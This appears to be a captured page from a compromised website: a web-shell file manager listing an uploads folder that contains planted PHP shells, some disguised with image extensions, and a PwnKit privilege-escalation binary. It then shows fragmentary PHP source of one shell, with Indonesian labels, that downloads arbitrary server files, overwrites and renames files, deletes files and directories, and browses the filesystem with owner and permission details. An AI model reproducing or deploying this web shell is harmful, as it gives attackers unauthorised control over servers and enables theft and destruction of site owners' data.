/var/www/vhosts/m-auto.co/httpdocs/uploads/slider
NameSizeModeActions
6a0f7c0b73ce1-Artboard 1@2x.png268710644editdlrm
6a4f9450eeb7e-rayea.php205260644editdlrm
6a4f9455d0a81-rayea.php.png205260644editdlrm
6a4f94320fa59-claw.php.png118210644editdlrm
6a6cd264463ed-9762e572-ede7-4f83-984d-329841a74854.jpg7610644editdlrm
6a8d452b0a571-sh.php760644editdlrm
6a8d4601a527a-fonts.php844430644editdlrm
6a8da1a57e5e6-fm.php73170644editdlrm
6a64f5a4d45a1-claw.php.png118210644editdlrm
404.php3028060644editdlrm
PwnKit180400755editdlrm
Edit: /var/www/vhosts/m-auto.co/httpdocs/uploads/slider/6a4f9455d0a81-rayea.php.png (20526B)
table{display:none;}

"; $_r = "required='required'"; $_x = ""; if(isset($_GET['option']) && $_POST['opt'] == 'download'){ header('Content-type: text/plain'); header('Content-Disposition: attachment; filename="'.$_POST['name'].'"'); echo(file_get_contents($_POST['path'])); exit(); } function ▟($path,$p) { if(isset($_GET['path'])) { $▚ = $_GET['path']; }else{ $▚ = getcwd(); } if(is_writable($▚)) { return "".$p.""; }else{ return "".$p.""; } } function ok(){ echo ''; } } echo "
Nama dir:
"; } } // akhir tools if(isset($_GET['filesrc'])){ echo "
name : ".basename($_GET['filesrc']);"
"; echo '
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'; } elseif(isset($_GET['option']) && $_POST['opt'] != 'hapus'){ echo '
name : '.basename($_POST['path']);'
'; // file if($_POST['opt'] == 'ganti_nama'){ if(isset($_POST['nama_baru'])){ if(rename($_POST['path'],$path.'/'.$_POST['nama_baru'])){ echo ""; }else{ echo 'Ganti nama gagal! '.er().'
'; } $_POST['name'] = $_POST['nama_baru']; } echo '
'; } elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit ok! '.ok().''; }else{ echo 'Edit gagal! '.er().''; } fclose($fp); } echo '
'; } }else{ //hapus dir & file if(isset($_GET['option']) && $_POST['opt'] == 'hapus'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo ""; }else{ echo 'Hapus dir gagal! '.er().''; } } elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo ""; }else{ echo 'Hapus file gagal! '.er().''; } } } $scandir = scandir($path); $pa = getcwd(); echo '
'; foreach($scandir as $dir){ $dt = date("Y-m-d H:i:s", filemtime("$path/$dir")); if(function_exists('posix_getpwuid')) { $downer = @posix_getpwuid(fileowner("$path/$dir")); $downer = $downer['name']; }else{ $downer = fileowner("$path/$dir"); } if(function_exists('posix_getgrgid')) { $dgrp = @posix_getgrgid(filegroup("$path/$dir")); $dgrp = $dgrp['name']; }else{ $dgrp = filegroup("$path/$dir"); } if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo " '; echo " "; } foreach($scandir as $file){ $ft = date("Y-m-d H:i:s", filemtime("$path/$file")); if(!is_file($path.'/'.$file)) continue; if(function_exists('posix_getpwuid')) { $fowner = @posix_getpwuid(fileowner("$path/$file")); $fowner = $fowner['name']; }else{ $fowner = fileowner("$path/$file"); } if(function_exists('posix_getgrgid')) { $fgrp = @posix_getgrgid(filegroup("$path/$file")); $fgrp = $fgrp['name']; }else{ $fgrp = filegroup("$path/$file"); } echo " '; echo " "; } } ?>
name last edit size owner:downer permission options
..
$dir $dt - $downer:$dgrp "; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo p("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '
$file $ft ".sz(filesize($file))." $fowner:$fgrp "; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo p("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '
©